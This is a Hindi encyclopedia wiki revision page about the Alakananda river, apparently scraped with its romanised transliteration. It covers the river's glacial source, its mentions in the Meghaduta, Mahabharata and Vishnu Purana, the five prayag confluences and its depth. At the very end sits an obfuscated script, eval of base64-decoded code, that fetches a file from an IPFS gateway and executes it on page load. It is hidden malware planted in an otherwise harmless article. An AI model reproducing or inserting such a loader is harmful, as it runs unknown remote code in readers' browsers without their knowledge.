Difference between revisions of "अलकनंदा नदी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
[[चित्र:Devprayag-Bhagirathi-River.jpg|thumb|250px|अलकनंदा और [[भागीरथी नदी|भागीरथी]] का संगम देवप्रयाग, [[उत्तराखंड]]]]
+
[[चित्र:Devprayag-Bhagirathi-River.jpg|thumb|250px|अलकनंदा और [[भागीरथी नदी|भागीरथी]] का संगम [[देवप्रयाग]], [[उत्तराखंड]]]]
 
'''अलकनंदा नदी''' [[कैलास]] और [[बद्रीनाथ]] के निकट बहने वाली [[गंगा नदी]] की एक शाखा है। यह गंगा के चार नामों में से एक है। चार धामों में गंगा के कई रूप और नाम हैं। [[गंगोत्री]] में गंगा को [[भागीरथी]] के नाम से जाना जाता है, [[केदारनाथ]] में [[मंदाकिनी नदी|मंदाकिनी]] और [[बद्रीनाथ]] में अलकनन्दा के नाम से जाना जाता है। यह [[उत्तराखंड]] में 'शतपथ' और 'भगीरथ खड़क' नामक [[हिमनद|हिमनदों]] से निकलती है। यह स्थान गंगोत्री कहलाता है। [[कालिदास]] ने [[मेघदूत]] में जिस [[अलकापुरी]] का वर्णन किया है वह [[कैलास पर्वत]] के निकट अलकंनदा के [[तट]] पर ही बसी होगी जैसा कि नाम-साम्य से प्रकट भी होता है। कालिदास ने [[अलका नगरी|अलका]] की स्थिति गंगा की गोदी में मानी है और गंगा से यहाँ अलकनंदा का ही निर्देश माना जा सकता है। संभवत: प्राचीन काल में पौराणिक परंपरा में अलकनंदा को ही गंगा का मूलस्रोत माना जाता था क्योंकि गंगा को स्वर्ग से गिरने के पश्चात सर्वप्रथम [[शिव]] ने अपनी अलकों अर्थात् जटाजूट में बाँध लिया था जिसके कारण नदी को शायद 'अलकनंदा' कहा गया। [[आकाशगंगा नदी]] की अलकनंदा की शाखा जान पड़ती है। अलकनंदा का वर्णन [[महाभारत]] [[वन पर्व महाभारत|वन पर्व]] के अंतर्गत तीर्थयात्रा प्रसंग में है जहाँ इसे [[भागीरथी नदी|भागीरथी]] नाम से भी अभिहित किया गया है और इसका उद्गम बदरिकाश्रम के निकट ही बताया गया है।
 
'''अलकनंदा नदी''' [[कैलास]] और [[बद्रीनाथ]] के निकट बहने वाली [[गंगा नदी]] की एक शाखा है। यह गंगा के चार नामों में से एक है। चार धामों में गंगा के कई रूप और नाम हैं। [[गंगोत्री]] में गंगा को [[भागीरथी]] के नाम से जाना जाता है, [[केदारनाथ]] में [[मंदाकिनी नदी|मंदाकिनी]] और [[बद्रीनाथ]] में अलकनन्दा के नाम से जाना जाता है। यह [[उत्तराखंड]] में 'शतपथ' और 'भगीरथ खड़क' नामक [[हिमनद|हिमनदों]] से निकलती है। यह स्थान गंगोत्री कहलाता है। [[कालिदास]] ने [[मेघदूत]] में जिस [[अलकापुरी]] का वर्णन किया है वह [[कैलास पर्वत]] के निकट अलकंनदा के [[तट]] पर ही बसी होगी जैसा कि नाम-साम्य से प्रकट भी होता है। कालिदास ने [[अलका नगरी|अलका]] की स्थिति गंगा की गोदी में मानी है और गंगा से यहाँ अलकनंदा का ही निर्देश माना जा सकता है। संभवत: प्राचीन काल में पौराणिक परंपरा में अलकनंदा को ही गंगा का मूलस्रोत माना जाता था क्योंकि गंगा को स्वर्ग से गिरने के पश्चात सर्वप्रथम [[शिव]] ने अपनी अलकों अर्थात् जटाजूट में बाँध लिया था जिसके कारण नदी को शायद 'अलकनंदा' कहा गया। [[आकाशगंगा नदी]] की अलकनंदा की शाखा जान पड़ती है। अलकनंदा का वर्णन [[महाभारत]] [[वन पर्व महाभारत|वन पर्व]] के अंतर्गत तीर्थयात्रा प्रसंग में है जहाँ इसे [[भागीरथी नदी|भागीरथी]] नाम से भी अभिहित किया गया है और इसका उद्गम बदरिकाश्रम के निकट ही बताया गया है।
 
:'नर नारायणस्थानं भागीरथ्योपशोभितम्'<ref>[[वनपर्व महाभारत|वनपर्व]] 145, 41</ref>
 
:'नर नारायणस्थानं भागीरथ्योपशोभितम्'<ref>[[वनपर्व महाभारत|वनपर्व]] 145, 41</ref>
 
यह भागीरथी अलकनंदा ही है क्योंकि नर नारायण - आश्रम अलकनंदा के तट पर ही है। वास्तव में [[महाभारत]] ने इस स्थान पर गंगा की दोनों शाखाओं-  
 
यह भागीरथी अलकनंदा ही है क्योंकि नर नारायण - आश्रम अलकनंदा के तट पर ही है। वास्तव में [[महाभारत]] ने इस स्थान पर गंगा की दोनों शाखाओं-  
*भागीरथी जो गंगोत्री से सीधी देवप्रयाग आती है  
+
*भागीरथी जो गंगोत्री से सीधी [[देवप्रयाग]] आती है  
 
*अलकनंदा जो कैलास और बदरिकाश्रम होती हुई देवप्रयाग में आकर भागीरथी से मिल जाती है- को अभिन्न ही माना है।  
 
*अलकनंदा जो कैलास और बदरिकाश्रम होती हुई देवप्रयाग में आकर भागीरथी से मिल जाती है- को अभिन्न ही माना है।  
 
[[विष्णु पुराण]]<ref>[[विष्णु पुराण]] 2,2,35</ref> में भी अलकनंदा का उल्लेख है-  
 
[[विष्णु पुराण]]<ref>[[विष्णु पुराण]] 2,2,35</ref> में भी अलकनंदा का उल्लेख है-  

Revision as of 05:26, 16 February 2012

[[chitr:Devprayag-Bhagirathi-River.jpg|thumb|250px|alakananda aur bhagirathi ka sangam devaprayag, uttarakhand]] alakananda nadi kailas aur badrinath ke nikat bahane vali ganga nadi ki ek shakha hai. yah ganga ke char namoan mean se ek hai. char dhamoan mean ganga ke kee roop aur nam haian. gangotri mean ganga ko bhagirathi ke nam se jana jata hai, kedaranath mean mandakini aur badrinath mean alakananda ke nam se jana jata hai. yah uttarakhand mean 'shatapath' aur 'bhagirath kh dak' namak himanadoan se nikalati hai. yah sthan gangotri kahalata hai. kalidas ne meghadoot mean jis alakapuri ka varnan kiya hai vah kailas parvat ke nikat alakannada ke tat par hi basi hogi jaisa ki nam-samy se prakat bhi hota hai. kalidas ne alaka ki sthiti ganga ki godi mean mani hai aur ganga se yahaan alakananda ka hi nirdesh mana ja sakata hai. sanbhavat: prachin kal mean pauranik paranpara mean alakananda ko hi ganga ka moolasrot mana jata tha kyoanki ganga ko svarg se girane ke pashchat sarvapratham shiv ne apani alakoan arthath jatajoot mean baandh liya tha jisake karan nadi ko shayad 'alakananda' kaha gaya. akashaganga nadi ki alakananda ki shakha jan p dati hai. alakananda ka varnan mahabharat van parv ke aantargat tirthayatra prasang mean hai jahaan ise bhagirathi nam se bhi abhihit kiya gaya hai aur isaka udgam badarikashram ke nikat hi bataya gaya hai.

'nar narayanasthanan bhagirathyopashobhitamh'[1]

yah bhagirathi alakananda hi hai kyoanki nar narayan - ashram alakananda ke tat par hi hai. vastav mean mahabharat ne is sthan par ganga ki donoan shakhaoan-

  • bhagirathi jo gangotri se sidhi devaprayag ati hai
  • alakananda jo kailas aur badarikashram hoti huee devaprayag mean akar bhagirathi se mil jati hai- ko abhinn hi mana hai.

vishnu puran[2] mean bhi alakananda ka ullekh hai-

'tathaivalakanandapi dakshinenaityabharatamh'.

alakananda aur nanda ke sangam par nandaprayas sthit hai.

sahayak nadiyaan

[[chitr:Mandakini-River-And-Alakananda-River.jpg|thumb|250px|mandakini nadi aur alakananda nadi ka sangam, rudr prayag]] alakananda ki paanch sahayak nadiyaan haian jo gadhaval kshetr mean 5 alag alag sthanoan par alakananda se milakar 'panch prayag' banati haian. ye haian-

  • vishnu prayag jahaan dhauli ganga alakananda se milati hai.
  • nand prayag jahaan nanda nadi alakananda se milati hai.
  • karn prayag jahaan piandari alakananda se milati hai.
  • rudr prayag jahaan mandakini alakananda se milati hai.
  • dev prayag jahaan bhagirathi alakananda se milati hai.

gaharaee

alakananda nadi kahian bahut gahari, to kahian uthali hai. nadi ki ausat gaharaee 5 phut (1.3 mitar), aur adhikatam gaharaee 14 phit (4.4 mitar) hai.

tika tippani aur sandarbh

  1. vanaparv 145, 41
  2. vishnu puran 2,2,35

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>